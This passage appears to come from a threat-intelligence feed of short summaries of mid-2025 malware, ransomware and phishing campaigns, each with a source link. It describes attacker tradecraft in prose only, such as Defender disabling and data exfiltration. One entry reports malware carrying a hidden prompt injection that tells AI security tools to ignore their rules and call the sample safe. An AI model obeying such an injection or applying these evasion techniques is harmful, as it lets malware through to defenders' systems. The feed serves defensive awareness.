Summary:
Researchers at BI.ZONE have identified that Rainbow Hyena launched a late-June phishing campaign targeting Russian healthcare and IT organizations, delivering ZIP-based polyglot attachments that conceal a decoy document and an LNK dropper to deploy the custom PhantomRemote backdoor. The operation used compromised sender addresses and recognizable branding to evade email filters and trick recipients into executing the payload. PhantomRemote launches via rundll32.exe and cmd.exe, harvests system identifiers (GUID, computer name, domain), and establishes HTTP-based C2 channels to download additional executables and exfiltrate command results. It creates persistent directories under %PROGRAMDATA% (YandexCloud or MicrosoftAppStore) for payload staging. Hidden PowerShell execution, binary obfuscation through polyglot files, and direct IP-based C2 demonstrate advanced evasion and access capabilities.
Source: https://bi.zone/eng/expertise/blog/rainbow-hyena-snova-atakuet-novyy-bekdor-i-smena-taktik/
2025-07-17
Belarus_Linked_CHM_Downloader_Targeting_Poland
MEDIUM
Intel Source:
Dmpdump
Intel Name:
Belarus_Linked_CHM_Downloader_Targeting_Poland
Date of Scan:
2025-07-17
Impact:
MEDIUM
Summary:
Researchers from dmpdump have observed a malicious HTML Help file exploiting Windows HTML Help to deploy a multi-stage downloader. Delivered as a fake bank transfer notification on June 30, 2025, the CHM triggers obfuscated script that leverages an ActiveX control to extract a staged loader from a CAB container. That loader uses XOR-based decryption and native HTTP APIs to fetch a concealed payload embedded in an image hosted on a remote server, then decrypts and executes it. The final payload establishes persistence by registering a scheduled task via COM. UNC1151 (FrostyNeighbor), a Belarus-linked actor, likely aims to maintain stealthy long-term access. The campaign’s living-off-the-land techniques and banking-themed lure illustrate advanced evasion.
Source: https://dmpdump.github.io/posts/Belarus-nexus_Threat_Actor_Target_Poland/
2025-07-17
Indonesian_Data_Leak_and_Jordan_Bank_Ransomware
LOW
Intel Source:
ASEC
Intel Name:
Indonesian_Data_Leak_and_Jordan_Bank_Ransomware
Date of Scan:
2025-07-17
Impact:
LOW
Summary:
Researchers at ASEC have discovered two coordinated data compromise and ransomware incidents. In November 2022, actor wonder exploited misconfigured APIs on a major Indonesian fintech platform to harvest authentication tokens and personal details for 44 million customers, later offering the data on LeakBase and BreachForums. Shortly thereafter, the Everest group infiltrated Jordan Bank in Jordan, exfiltrating over 11 GB of internal records before deploying encryption malware and issuing double-extortion demands.
Source: https://asec.ahnlab.com/en/88936/
2025-07-16
Octalyn_Stealer
LOW
Intel Source:
Cyfirma
Intel Name:
Octalyn_Stealer
Date of Scan:
2025-07-16
Impact:
LOW
Summary:
Cyfirma researchers have discovered a new malware called Octalyn Stealer, which is designed to steal sensitive data from Windows systems. It is built in C++ and comes with a Delphi-based builder tool, allowing low-skilled attackers to create custom malware using a Telegram bot token and chat ID. Once executed, it silently steals browser passwords, cookies, Discord and Telegram tokens, VPN settings, gaming account info, and cryptocurrency wallet data. The malware achieves persistence by modifying the Startup folder and a Windows registry key to run automatically at system startup. It can also deliver additional malicious files using hidden PowerShell scripts. The stolen data is saved in a temporary folder named Octalyn, zipped into an archive, and then exfiltrated to the attacker via the Telegram API.
Source: https://www.cyfirma.com/research/octalyn-stealer-unmasked/
2025-07-16
GLOBAL_GROUP_RaaS_Operator
MEDIUM
Intel Source:
EclecticIQ
Intel Name:
GLOBAL_GROUP_RaaS_Operator
Date of Scan:
2025-07-16
Impact:
MEDIUM
Summary:
EclecticIQ researchers have uncovered a new ransomware-as-a-service (RaaS) group dubbed GLOBAL_GROUP, operated by the threat actor “$$$”. This group offers an 85% share of ransom payments, along with user-friendly features like a mobile-accessible control panel and an AI-driven negotiation system. Their affiliates gain initial network access through brokers and brute-force tools to deploy customized ransomware capable of encrypting data across Windows, Linux, macOS, and VMware ESXi hosts. Once inside, affiliates communicate with victims through encrypted Tor-based sites to demand ransom and leverage AI-powered chatbots to engage victims during ransom negotiations, aiming to increase psychological pressure. So far, their attacks have impacted organizations in sectors like healthcare, oil-and-gas, industrial manufacturing, automotive services, and outsourcing, with victims located in countries including the U.S., U.K., Australia, and Brazil.
Source: https://blog.eclecticiq.com/global-group-emerging-ransomware-as-a-service
2025-07-16
Dark_101_Ransomware
MEDIUM
Intel Source:
Fortinet
Intel Name:
Dark_101_Ransomware
Date of Scan:
2025-07-16
Impact:
MEDIUM
Summary:
FortiGuard researchers have discovered a new ransomware called Dark 101, built on the .NET framework. It uses environmental checks and time-based delays to evade sandbox analysis. Once on a system, it hides by copying itself to the %AppData% folder under the name svchost.exe, mimicking a legitimate Windows system process. It then executes several commands such as vssadmin, wmic, and wbadmin to delete Volume Shadow Copies and the Windows Backup catalog. Additionally, it disables Task Manager by modifying system registry settings to prevent users from closing it manually. The malware scans for files with specific extensions, encrypts them, appends a random four-letter extension to the filenames and drops a read_it.txt ransom note demanding payment in Bitcoin. As a result, victims are left without easy recovery options and face significant operational disruption and potential financial loss.
Source: https://www.fortinet.com/blog/threat-research/fortisandbox-detects-dark-101-ransomware-despite-evasion-techniques
2025-07-16
Multi_Stage_Phishing_via_Reservation_Portals
MEDIUM
Intel Source:
Google Threat Intelligence
Intel Name:
Multi_Stage_Phishing_via_Reservation_Portals
Date of Scan:
2025-07-16
Impact:
MEDIUM
Summary:
Researchers at Google Threat Intelligence have uncovered a large-scale phishing operation exploiting legitimate reservation messaging channels to harvest payment credentials and personal data. The campaign employed a multi-stage infrastructure, with Tier 1 redirectors registered to domains mimicking genuine hotel confirmations and Tier 2 hosts serving fraudulent booking sites. Activity accelerated from January 2025, peaking in May and June, and was observed through both in-app chat threads and authentic-looking emails. Actors leveraged automated domain registration and meta-tag analysis to expand their infrastructure, then delivered victims a malicious archive containing logs of stolen guest booking details.
Source: https://www.googlecloudcommunity.com/gc/Community-Blog/Actionable-threat-hunting-with-GTI-II-Analyzing-a-massive/ba-p/923129?linkId=15662116
2025-07-15
A_Hybrid_Approach_of_BlackSuit_Ransomware
MEDIUM
Intel Source:
Cybereason
Intel Name:
A_Hybrid_Approach_of_BlackSuit_Ransomware
Date of Scan:
2025-07-15
Impact:
MEDIUM
Summary:
Researchers from Cybereason have uncovered a ransomware group known as BlackSuit that emerged in mid-2023 and is believed to be a successor to the Royal ransomware group. The group operates organized, multi-stage attacks involving both data exfiltration and file encryption. The attackers leverage Cobalt Strike Beacon for C2, deploy payloads through PowerShell commands, and disguise legitimate tools like rclone.exe to evade detection. They move laterally across the network using tools like PsExec, RPC, and RDP, even adding fake administrator accounts to gain wider access. The attackers also steal credentials from LSASS for privilege escalation, exfiltrate around 60 GB of sensitive data to cloud-based servers and demand ransoms between $1 million and $10 million in Bitcoin.
Source: https://www.cybereason.com/blog/blacksuit-data-exfil
2025-07-12
Fake_CAPTCHA_Social_Engineering
LOW
Intel Source:
Linkedin
Intel Name:
Fake_CAPTCHA_Social_Engineering
Date of Scan:
2025-07-12
Impact:
LOW
Summary:
Shaquib Izhar’s analysis on LinkedIn revealed an emerging social engineering campaign that ensnares victims with a counterfeit CAPTCHA page mimicking a common web security check. Upon clicking “Verify,” the page silently copies PowerShell code to the clipboard and prompts users to launch the Windows Run dialog, where it registers a webhook to monitor execution. The payload chain then delivers a secondary PowerShell loader and a batch script designed to detect and bypass virtualized environments before unleashing additional malware on standard Windows systems.
Source: https://www.linkedin.com/posts/shaquib-izhar_a-very-cool-fake-captcha-social-engineering-activity-7346678407419613184-B0-Y/?utm_source=social_share_send&utm_medium=member_desktop_web&rcm=ACoAABO-jCkB1he5ufTfbYYMNKmaojg8M31OVpM
2025-07-12
Fake_SPID_Certificate_Renewal_Campaign
LOW
Intel Source:
CERT-AGID
Intel Name:
Fake_SPID_Certificate_Renewal_Campaign
Date of Scan:
2025-07-12
Impact:
LOW
Summary:
CERT-AGID researchers have observed a phishing campaign targeting SPID users. The campaign involves fraudulent emails with the subject “Your digital certificate has just been renewed”, prompting recipients to download a counterfeit digital certificate supposedly necessary for SPID access. Once clicked, recipients are redirected to a deceptive SPID login page to harvest credentials. Although the messages appear to come from noreply@spid.gov.it, they are actually sent from third-party servers lacking DKIM signatures, exploiting SPF misconfigurations to evade detection. If credentials are compromised, attackers could hijack SPID sessions, enabling unauthorized access to sensitive government and private-sector information.
Source: https://cert-agid.gov.it/news/il-tema-spid-ancora-sfruttato-per-una-nuova-campagna-di-phishing/
2025-07-12
Kimsuky_Deploys_VMP_Protected_HappyDoor_Backdoor
MEDIUM
Intel Source:
360 Threat Intelligence Center
Intel Name:
Kimsuky_Deploys_VMP_Protected_HappyDoor_Backdoor
Date of Scan:
2025-07-12
Impact:
MEDIUM
Summary:
The 360 Threat Intelligence Center has identified a recent espionage campaign attributed to the North Korea-based APT group Kimsuky (APT-C-55), targeting entities in South Korea. The threat actor uses a trojanized installer for the legitimate Bandizip software as an initial access vector. Upon execution, the installer deploys the HappyDoor backdoor, a known Kimsuky tool, which has been newly upgraded with a VMProtect shell to significantly hinder analysis and evade detection. The multi-stage infection process also involves using mshta.exe to fetch remote VBScript payloads for reconnaissance and data exfiltration. The backdoor establishes persistence via scheduled tasks and is capable of keylogging, screen capture, and stealing files with specific extensions such as .hwp and .pdf.
Source: https://mp.weixin.qq.com/s/fDan8ihUQEAF5Kf_6fXATQ?
2025-07-12
An_Investigation_of_Qilin_Ransomware
LOW
Intel Source:
Cyberint
Intel Name:
An_Investigation_of_Qilin_Ransomware
Date of Scan:
2025-07-12
Impact:
LOW
Summary:
Researchers at Cyberint have observed that Qilin operates as an affiliate ransomware-as-a-service program deploying Rust-based binaries via spearphishing links to deliver customized double extortion campaigns. The campaign first exfiltrates sensitive data through malicious links embedded in phishing emails and then encrypts critical files using configurable modes—skip-step, percent, or fast—to maximize impact. Operators terminate specific processes, inhibit system recovery, and reboot hosts to hinder remediation. Victim data from multiple industries and geographies is posted on a proprietary dark-web leak site, pressuring organizations to comply. Samples exist for Windows and ESXi platforms, with the Rust variant offering enhanced evasion and resistance to analysis. Large-scale exfiltration campaigns have stolen hundreds of gigabytes of financial and proprietary data, including 340 GB from a U.S. financial advisory firm on July 1, 2025.
Source: https://cyberint.com/blog/research/qilin-ransomware/
2025-07-12
Prompt_Injection_Malware
LOW
Intel Source:
Checkpoint
Intel Name:
Prompt_Injection_Malware
Date of Scan:
2025-07-12
Impact:
LOW
Summary:
Researchers at Check Point have discovered a new malware called Skynet that was anonymously uploaded from the Netherlands. Although the malware is still in an early stage and not fully functional, it tries to trick AI-based security systems by including a hidden prompt injection that instructs the AI to ignore its usual rules and incorrectly label the malware as safe. The malware also tries to evade detection using sandbox evasion, gathers basic system information and sets up a secure connection using the TOR network.
Source: https://research.checkpoint.com/2025/ai-evasion-prompt-injection/
2025-07-12
RedDirection_Malicious_Browser_Extensions
MEDIUM
Intel Source:
Medium (Koi Security)
Intel Name:
RedDirection_Malicious_Browser_Extensions
Date of Scan:
2025-07-12
Impact:
MEDIUM
Summary:
Researchers at Koi Security have observed eighteen malicious Chrome and Edge extensions that hijacked browser sessions and exfiltrated every visited URL from over 2.3 million users. Delivered via innocuous version updates through official auto-update pipelines, the extensions injected background scripts that captured tab URLs and unique identifiers, relaying them to a centralized command-and-control infrastructure. The attackers exploited trust signals (verified publisher badges, featured placement and positive reviews) to evade marketplace vetting and persist undetected for years. Once activated, the malware periodically executed remote-instructed redirects to attacker-controlled sites, creating a persistent man-in-the-browser capability.
Source: https://blog.koi.security/google-and-microsoft-trusted-them-2-3-million-users-installed-them-they-were-malware-fb4ed4f40ff5
2025-07-12
M365_Direct_Send_Phishing_Campaign
MEDIUM
Intel Source:
Varonis
Intel Name:
M365_Direct_Send_Phishing_Campaign
Date of Scan:
2025-07-12
Impact:
MEDIUM
Summary:
Researchers at Varonis have uncovered a phishing campaign exploiting Microsoft 365’s Direct Send feature to trick organizations. Normally, Direct Send is used by internal devices to send emails within an organisation without requiring authentication. The attackers send phishing emails disguised as voicemail notifications. These emails contain PDF attachments with QR codes. When scanned, the QR codes redirect victims to deceptive websites designed to steal their login credentials. The phishing emails are sent from an IP address located in Ukraine and bypass basic email security checks such as SPF, DKIM and DMARC; they are delivered because the Direct Send feature treats them like internal messages. The campaign began in May 2025 and has already targeted over 70 organizations in the U.S., spanning different industries.
Source: https://www.varonis.com/blog/direct-send-exploit
2025-07-12
Supply_Chain_Attack_Targets_Ethereum_Developers
LOW
Intel Source:
Reversinglabs
Intel Name:
Supply_Chain_Attack_Targets_Ethereum_Developers
Date of Scan:
2025-07-12
Impact:
LOW
Summary:
ReversingLabs researchers uncovered a supply chain attack involving a GitHub user named Airez299, who compromised the ETHcode extension for Visual Studio Code. The attacker submitted a pull request that added a malicious dependency called keythereum-utils, which leverages Node.js’s require function to execute obfuscated JavaScript that silently launches a hidden PowerShell process. This process then downloads and runs a secondary payload from a public file-hosting site. The campaign targets Ethereum smart contract developers through the extension’s automatic update mechanism, which had reached roughly 6,000 installs.
Source: https://www.reversinglabs.com/blog/malicious-pull-request-infects-vscode-extension
2025-07-12
Malicious_Inno_Setup_Loader_Deploys_RedLine_Stealer
LOW
Intel Source:
Splunk
Intel Name:
Malicious_Inno_Setup_Loader_Deploys_RedLine_Stealer
Date of Scan:
2025-07-12
Impact:
LOW
Summary:
Splunk researchers uncovered a new malware campaign that uses a fake software installer created with Inno Setup. This installer includes a Pascal script designed to detect and evade debugger and sandbox environments before retrieving and decrypting a multi-stage payload. The installer connects to a TinyURL link that redirects to a file-hosting site (rentry.org), where it downloads a password-protected ZIP file. Once extracted, the malware runs a loader that decrypts and executes a malicious DLL file, which then loads a secondary payload known as HijackLoader. It also creates a hidden scheduled task called lang that runs a disguised program every time the system restarts. In the final stage, the attack drops RedLine Stealer, which collects saved passwords, cookies, form-fill data, and crypto wallet keys from various browsers and extensions.
Source: https://www.splunk.com/en_us/blog/security/inno-setup-malware-redline-stealer-campaign.html
2025-07-12
Oyster_Broomstick_Backdoor_via_SEO_Poisoning
MEDIUM
Intel Source:
Arcticwolf
Intel Name:
Oyster_Broomstick_Backdoor_via_SEO_Poisoning
Date of Scan:
2025-07-12
Impact:
MEDIUM
Summary:
Researchers from Arctic Wolf have observed a malvertising campaign leveraging search engine optimization poisoning to redirect IT professionals to trojanized installers of PuTTY and WinSCP. Embedded within legitimate packages, the Oyster and Broomstick backdoors grant stealthy remote-access footholds on on-premises administrative workstations. The campaign’s reliance on trusted binaries and absence of overt indicators complicates detection and response.
Source: https://arcticwolf.com/resources/blog/malvertising-campaign-delivers-oyster-broomstick-backdoor-via-seo-poisoning-trojanized-tools/
2025-07-12
Rhadamanthys_Infostealer_ClickFix_CAPTCHA_Delivery
LOW
Intel Source:
Dark Atlas
Intel Name:
Rhadamanthys_Infostealer_ClickFix_CAPTCHA_Delivery
Date of Scan:
2025-07-12
Impact:
LOW
Summary:
Researchers at Darkatlas have identified the Rhadamanthys infostealer campaign using a typosquatted ClickFix CAPTCHA domain to deliver a stealthy PowerShell launcher that executes in memory and retrieves a malicious MSI package, enabling a fileless dropper flow. That dropper fetches and executes PTRFHDGS.msi via msiexec.exe, masquerading as legitimate software and displaying a fake “Verification complete!” prompt to deceive users. The malware employs multiple anti-analysis checks—including virtualization and debugger detection, as well as time-based side-channel evasion—to hinder sandbox and manual analysis. Once active, Rhadamanthys’ modular architecture harvests a broad range of sensitive data—system identifiers, browser credentials, cryptocurrency wallets, screenshots, and application configurations—from Windows hosts.
Source: https://darkatlas.io/blog/clickfix-chaos-a-deep-dive-into-rhadamanthys-infostealers-stealth-and-steal-tactics
2025-07-12
Defendnot_A_Silent_Windows_Defender_Disabler
MEDIUM
Intel Source:
Stairwell
Intel Name:
Defendnot_A_Silent_Windows_Defender_Disabler
Date of Scan:
2025-07-12
Impact:
MEDIUM
Summary:
Stairwell researchers have highlighted a new tool called defendnot, developed by a user named es3n1n, which is designed to quietly disable Microsoft Defender. This tool leverages a sneaky technique by registering itself as another antivirus program through the Windows Security Center (WSC) API, causing Defender to voluntarily disable itself. Although defendnot was initially released for red teaming, its design makes it useful for cybercriminals or nation-state actors. If attackers use this tool after compromising a system, they can run malware without being detected.
Source: https://stairwell.com/resources/detecting-defendnot-a-tool-for-silently-disabling-windows-defender/
2025-07-12
Exploitation_Wing_FTP_Serve_Vulnerability
MEDIUM
Intel Source:
Huntress
Intel Name:
Exploitation_Wing_FTP_Serve_Vulnerability
Date of Scan:
2025-07-12
Impact:
MEDIUM
Summary:
Researchers from Huntress discovered that attackers were actively exploiting a vulnerability (CVE-2025-47812) in Wing FTP Server versions prior to 7.4.4. This flaw allows attackers to execute remote code on the system with full privileges. The attackers sent crafted requests to the server’s login page, injecting malicious Lua scripts that enabled them to run system commands like cmd.exe and certutil. Once inside, the attackers ran basic reconnaissance commands such as ipconfig and whoami, created two backdoor user accounts named wingftp and wing, and tried to install a remote access tool (ScreenConnect) along with a second-stage malware payload. However, this activity was flagged and blocked by Microsoft Defender as a Trojan named Ceprol.
Source: https://www.huntress.com/blog/wing-ftp-server-remote-code-execution-cve-2025-47812-exploited-in-wild
2025-07-12
Lumma_Stealer_Deploys_Follow_up_Malware
LOW
Intel Source:
Malware Traffic
Intel Name:
Lumma_Stealer_Deploys_Follow_up_Malware
Date of Scan:
2025-07-12
Impact:
LOW
Summary:
Researchers from Malware-Traffic have identified a malware campaign distributing Lumma Stealer, which subsequently deploys a persistent backdoor. The initial infection vector is social engineering, luring victims with cracked "Turnitin" software promoted on a Facebook page as of June 26, 2025. The user downloads a password-protected archive containing a Nullsoft installer. Upon execution, the installer uses an obfuscated batch script and a legitimate AutoIt interpreter to run the Lumma Stealer payload, which exfiltrates data from the compromised Windows system. The stealer then downloads a secondary loader, which retrieves a penetration testing tool from GitHub and establishes persistence via a shortcut in the Windows Startup folder.
Source: https://www.malware-traffic-analysis.net/2025/06/26/index.html
2025-07-12
SLOW_TEMPEST_Malware_Obfuscation
MEDIUM
Intel Source:
unit42
Intel Name:
SLOW_TEMPEST_Malware_Obfuscation
Date of Scan:
2025-07-12
Impact:
MEDIUM
Summary:
According to Unit 42’s analysis, SLOW#TEMPEST employs advanced control-flow obfuscation and dynamic jump dispatchers within a loader DLL to impede static reverse-engineering. The actor delivers an ISO-based dropper that uses the Windows API GlobalMemoryStatusEx to verify system memory exceeds six gigabytes before unpacking the payload, an anti-sandbox measure. First documented in July 2025, this campaign targets Windows environments where indirect function calls and obfuscated API invocations thwart signature and static analysis.
Source: https://unit42.paloaltonetworks.com/slow-tempest-malware-obfuscation/
2025-07-12
CapCut_Phishing_Campaign_Targets_Apple_Users
LOW
Intel Source:
Cofense
Intel Name:
CapCut_Phishing_Campaign_Targets_Apple_Users
Date of Scan:
2025-07-12
Impact:
LOW
Summary:
Cofense researchers have uncovered a phishing campaign in which attackers create fake CapCut invoices to trick users into giving up their Apple credentials and payment information. The attackers send a fake email claiming a $49.99 CapCut Pro charge via Apple, prompting users to cancel the subscription. When clicked, they’re taken to a deceptive Apple login page hosted on a non-Apple website, where their Apple ID credentials are stolen. The attack then escalates with a second phishing page requesting credit card details under the guise of processing a refund. The attackers even show a fake two-factor authentication screen designed to steal both login and payment details while keeping the victim engaged. If successful, it can lead to account takeovers, stolen money and identity theft.
Source: https://cofense.com/blog/capcut-con-apple-phishing-card-stealing-refund-ruse
2025-07-12
Unauthorized_Proxy_Deployment_on_Linux_SSH
LOW
Intel Source:
ASEC
Intel Name:
Unauthorized_Proxy_Deployment_on_Linux_SSH
Date of Scan:
2025-07-12
Impact:
LOW
Summary:
Researchers at ASEC have identified a campaign in which attackers target Linux systems with weak SSH passwords. The attackers gain initial access through brute-force or dictionary attacks and then execute Bash scripts to install proxy software such as TinyProxy or Sing-box. For TinyProxy, they modify the configuration to allow unrestricted internet access and ensure the proxy starts automatically with the system. The Sing-box installation involves downloading and executing a one-click installation script from a public GitHub repository, enabling support for multiple proxy protocols including vmess-argo and TUICv5. These proxies can be leveraged to conceal further malicious activity or sold for illicit use.
Source: https://asec.ahnlab.com/ko/88669/
2025-07-11
DoNotAPT
HIGH
Intel Source:
Trellix
Intel Name:
DoNotAPT
Date of Scan:
2025-07-11
Impact:
HIGH
Summary:
According to Trellix Advanced Research Center, the DoNot APT group conducted a multi-stage spear-phishing campaign against a Southern European foreign affairs ministry to facilitate long-term cyber espionage. The attackers impersonated defense officials in a crafted email with a Google Drive link, delivering a password-protected RAR archive that deployed a custom “LoptikMod” backdoor masquerading as a PDF. Once executed, the malware used binary-encoded obfuscation, dynamic API resolution, and scheduled tasks to achieve persistence. It gathered system details—including CPU model, OS build, username, hostname, and installed software—encrypted them with AES, and exfiltrated them via HTTPS POST to a malicious domain. Follow-on downloads of a DLL module (“socker.dll”) and additional scheduled tasks (“MicorsoftVelocity”) enabled further command and control. Primary targets were government and diplomatic organizations running Windows. The operation’s impact includes unauthorized access to sensitive diplomatic communications, exposure of MFA credentials, and sustained network compromise.
Source: https://www.trellix.com/blogs/research/from-click-to-compromise-unveiling-the-sophisticated-attack-of-donot-apt-group-on-southern-european-government-entities/
2025-07-11
GeoServer_CoinMiner_Exploit_Campaign
LOW
Intel Source:
ASEC
Intel Name:
GeoServer_CoinMiner_Exploit_Campaign
Date of Scan:
2025-07-11
Impact:
LOW
Summary:
Researchers at AhnLab Security Emergency response Center have observed ongoing exploitation of unpatched GeoServer instances following the CVE-2024-36401 disclosure in 2024, allowing adversaries to execute remote code and deploy Monero mining payloads. These actors conduct automated scans for vulnerable GeoServer hosts, leverage the Java-based RCE to install NetCat for reverse-shell access and XMRig via platform-native scripts on both Windows and Linux systems.
Source: https://asec.ahnlab.com/en/88917/
2025-07-10
LogoKit_Phishing_Campaign
LOW
Intel Source:
Cyble
Intel Name:
LogoKit_Phishing_Campaign
Date of Scan:
2025-07-10
Impact:
LOW
Summary:
Researchers at Cyble have uncovered an ongoing phishing campaign that leverages LogoKit, which is designed to steal login credentials by impersonating legitimate organizations. The threat actors are masquerading as entities such as HunCERT, Kina Bank, the Catholic Church, and logistics companies to deceive users into entering their credentials. These fraudulent pages are hosted on Amazon S3 and Render and appear legitimate by incorporating Cloudflare Turnstile (a CAPTCHA service) and automatically retrieving real logos from Clearbit and Google Favicon. Once a victim enters their credentials, the data is exfiltrated to a C2 server through an HTTP POST request. The stolen credentials can enable attackers to gain unauthorized access, carry out business email compromise (BEC), move laterally within networks, and potentially cause major data breaches.
Source: https://cyble.com/blog/logokit-being-leveraged-for-credential-theft/
2025-07-10
A_Deep_Dive_into_XWorm_Malware
MEDIUM
Intel Source:
Splunk
Intel Name:
A_Deep_Dive_into_XWorm_Malware
Date of Scan:
2025-07-10
Impact:
MEDIUM
Summary:
Researchers at Splunk have identified that XWorm employs a rotating arsenal of droppers, stagers, and payloads to evade detection and maintain persistent access on Windows endpoints. It leverages phishing lures impersonating invoices, shipping notices, or business requests to trick users into executing malicious attachments. XWorm is delivered in multiple formats such as .exe, .js, .vbs, .bat, .hta and .lnk, and it uses advanced evasion techniques such as AMSI bypass, ETW disablement, and registry-based Defender exclusions. It achieves persistence by creating registry keys, scheduled tasks and startup folder entries, through DLL side-loading, and via USB or removable media. Once active, it performs discovery of AV products, video-capture drivers, and graphics card information before establishing HTTP-based C2 communications. The main objective of this malware is unauthorized data access, potential lateral movement, and long-term undetected system compromise.
Source: https://www.splunk.com/en_us/blog/security/xworm-shape-shifting-arsenal-detection-evasion.html
2025-07-10
Pay2KeyI2P_Iranian_RaaS_Targets_the_West
HIGH
Intel Source:
Morphisec
Intel Name:
Pay2KeyI2P_Iranian_RaaS_Targets_the_West
Date of Scan:
2025-07-10
Impact:
HIGH
Summary:
Morphisec's researchers have uncovered the resurgence of Pay2Key, an Iranian-backed ransomware-as-a-service (RaaS) operation now operating as Pay2Key.I2P and linked to the Fox Kitten APT group. Active since February 2025, this financially and ideologically motivated campaign targets Western organizations, particularly those perceived as enemies of Iran, and has already amassed over $4 million in ransoms. The attack begins with a sophisticated, multi-stage 7-Zip SFX payload that uses a polyglot CMD and PowerShell script to execute a series of anti-analysis checks and defense evasion techniques, including disabling Microsoft Defender. The final payload is the Themida-protected Mimic ransomware. With the recent addition of a Linux variant and a lucrative 80% profit share for affiliates attacking ideological targets, the threat surface is expanding.
Source: https://www.morphisec.com/blog/pay2key-resurgence-iranian-cyber-warfare/
2025-07-10
SilentRoute_Backdoor_Exfiltrates_Credentials
MEDIUM
Intel Source:
ESentire
Intel Name:
SilentRoute_Backdoor_Exfiltrates_Credentials
Date of Scan:
2025-07-10
Impact:
MEDIUM
Summary:
Researchers at eSentire uncovered a campaign in which threat actors created a fake version of SonicWall’s NetExtender VPN client by adding a hidden backdoor called SilentRoute. This campaign leverages an SEO poisoning tactic to lure remote-access users into downloading this malicious version from a legitimate-looking website that hosts a malicious installer named SonicWall-NetExtender.msi. Once installed, it captures login credentials—including domain, username, and password—which are then exfiltrated to an attacker-controlled server. The main objective of this campaign is to target corporate users of the SonicWall VPN client, allowing attackers to log in to organisation networks as legitimate users, move laterally and conduct additional malicious activities.
Source: https://www.esentire.com/blog/threat-actors-recompile-sonicwalls-netextender-to-include-silentroute-backdoor
2025-07-09
XMRig_Global_Cryptomining_Campaign
LOW
Intel Source:
GData
Intel Name:
XMRig_Global_Cryptomining_Campaign
Date of Scan:
2025-07-09
Impact:
LOW
Summary:
Researchers at GDATA Security Lab have identified a global cryptomining campaign leveraging XMRig to mine Monero cryptocurrency that emerged in April 2025. The campaign begins with the execution of batch script files via svchost.exe, followed by PowerShell commands that download and execute additional payloads. The attackers create scheduled tasks to disable Windows Defender and automatic update services before deploying the XMRig miner under random names to evade detection. They use LOLBAS techniques and hidden PowerShell windows to ensure persistence, leading to degraded system performance, increased energy consumption, and disruption of system maintenance. The malware has been observed in multiple countries, indicating that it targets systems worldwide.
Source: https://www.gdatasoftware.com/blog/2025/07/38228-monero-malware-xmrig-resurgence
2025-07-09
NordDragonScan_Target_Window_Systems
MEDIUM
Intel Source:
Fortinet
Intel Name:
NordDragonScan_Target_Window_Systems
Date of Scan:
2025-07-09
Impact:
MEDIUM
Summary:
Researchers at FortiGuard have discovered a new information-stealing malware called NordDragonScan, targeting Windows systems primarily in Ukraine’s government and energy sectors. The malware is distributed through shortened URLs and malicious shortcut files, which execute a malicious HTA script that installs a .NET-based payload. It leverages the legitimate PowerShell binary to download a hidden payload and installs a file named adblocker.exe inside a folder named NordDragonScan. Once installed, it collects system information, captures screenshots, steals files and PDFs from common directories and extracts saved browser data from Chrome and Firefox. Additionally, it scans the local network to identify other reachable systems and exfiltrates all collected data to a remote server over HTTPS. Victims are lured with fake Ukrainian-language documents related to government and energy sector communications.
Source: https://www.fortinet.com/blog/threat-research/norddragonscan-quiet-data-harvester-on-windows
2025-07-09
Batavia_Malware_Targeting_Russia
LOW
Intel Source:
Securelist
Intel Name:
Batavia_Malware_Targeting_Russia
Date of Scan:
2025-07-09
Impact:
LOW
Summary:
Securelist researchers have discovered a new malware strain called Batavia that emerged in July 2024. This malware targets Russian industrial enterprises and is delivered through spear-phishing emails disguised as business contracts. When a victim clicks the malicious link, it downloads a VBScript downloader that decrypts and installs additional payloads, including two separate executable files, WebView.exe and javav.exe, which are used to collect sensitive files such as Microsoft Office documents, system logs, and files from USB drives or other removable media. Additionally, Batavia takes screenshots of the victim's screen and computes file hashes to avoid uploading duplicate files. The malware communicates with its C2 server over HTTPS and obfuscates its payloads using XOR and Base64 encoding. To maintain persistence, it creates a shortcut in the Start Menu's startup folder, ensuring execution on each user login.
Source: https://securelist.com/batavia-spyware-steals-data-from-russian-organizations/116866/
2025-07-08
NightEagle_Exploits_Exchange_for_Espionage
MEDIUM
Intel Source:
RedDrip7
Intel Name:
NightEagle_Exploits_Exchange_for_Espionage
Date of Scan:
2025-07-08
Impact:
MEDIUM
Summary:
Researchers at RedDrip7 have disclosed that the APT group NightEagle exploited a previously unknown Microsoft Exchange deserialization vulnerability to achieve remote code execution on targeted Exchange servers. The group’s operations appear to be strategically motivated, with a focus on exfiltrating sensitive email data from high-tech Chinese organizations. To establish internal network access, NightEagle deployed a modified Chisel reverse tunnel disguised as a legitimate Synology update service. This was followed by memory-only injection of a custom .NET loader delivered through virtual URL web shells. The implant enabled sustained, covert remote email harvesting and command execution while avoiding disk-based detection mechanisms.
Source: https://github.com/RedDrip7/NightEagle_Disclose/blob/main/Exclusive%20disclosure%20of%20the%20attack%20activities%20of%20the%20APT%20group%20NightEagle.pdf
2025-07-08
Tomcat_Partial_PUT_Camel_Header_Hijack
MEDIUM
Intel Source:
unit42
Intel Name:
Tomcat_Partial_PUT_Camel_Header_Hijack
Date of Scan:
2025-07-08
Impact:
MEDIUM
Summary:
During March 2025, Unit 42 observed a surge in attacks leveraging two critical Apache vulnerabilities. CVE-2025-24813 permits remote deserialization via Tomcat’s standard partial PUT mechanism, and CVE-2025-27636/29891 abuse Camel’s header processing to execute arbitrary commands. Exploitation attempts exceeded 7,800 across more than 70 countries, confirming a global automated campaign. Attackers identify targets via session name enumeration and Content-Range manipulation before delivering payloads that result in remote code execution.
Source: https://unit42.paloaltonetworks.com/apache-cve-2025-24813-cve-2025-27636-cve-2025-29891/
2025-07-07
Datacarry_Ransomware_Campaign
MEDIUM
Intel Source:
CCITIC
Intel Name:
Datacarry_Ransomware_Campaign
Date of Scan:
2025-07-07
Impact:
MEDIUM
Summary:
The Cyber Counter-Intelligence Threat Investigation Consortium (CCITIC) has identified a targeted campaign by the Datacarry ransomware group, active since June 2024 and intensifying significantly in spring 2025. The group exploits a critical vulnerability in Fortinet EMS (CVE-2023-48788) to gain initial access. Following exploitation, they use PowerShell to configure the environment for deploying a Go-based implant, which enables persistent command-and-control communication via the Chisel tunneling tool over WebSockets. The actors exfiltrate large volumes of data before deploying a Conti-variant ransomware payload.
Source: https://www.ccitic.org/assets/reports/CCITIC_Report_TLP-White_DATACARRY.pdf
2025-07-07
APT36_Targets_Indian_Defence_Via_BOSS_Linux_Systems
MEDIUM
Intel Source:
Cyfirma
Intel Name:
APT36_Targets_Indian_Defence_Via_BOSS_Linux_Systems
